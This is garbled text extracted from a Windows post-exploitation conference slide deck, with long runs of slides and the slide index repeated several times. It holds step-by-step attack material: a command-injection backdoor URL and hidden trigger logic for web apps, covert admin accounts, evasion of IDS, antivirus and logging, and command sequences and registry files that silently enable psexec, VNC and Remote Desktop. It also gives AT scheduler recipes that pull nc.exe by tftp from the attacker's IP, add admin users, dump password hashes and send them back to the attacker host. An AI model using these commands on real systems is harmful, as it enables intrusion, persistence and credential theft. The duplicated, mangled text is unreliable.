bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
